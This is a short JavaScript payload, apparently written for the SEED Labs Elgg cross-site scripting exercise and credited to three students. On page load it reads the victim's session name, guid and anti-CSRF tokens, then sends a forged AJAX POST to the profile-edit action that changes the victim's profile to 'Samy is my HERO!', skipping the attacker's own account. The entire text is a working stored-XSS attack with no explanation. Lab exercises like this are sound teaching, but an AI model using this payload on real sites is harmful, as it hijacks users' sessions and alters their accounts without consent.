<script type="text/javascript">
window.onload = function()
{

var userName="&name="+elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var description="&description=Samy is my HERO!, added by Aslam, Justice and Yaw";var content=token + ts + userName + description + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit";//here, in this  samy uid is 47
if(elgg.session.user.guid!=47){
//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script> 
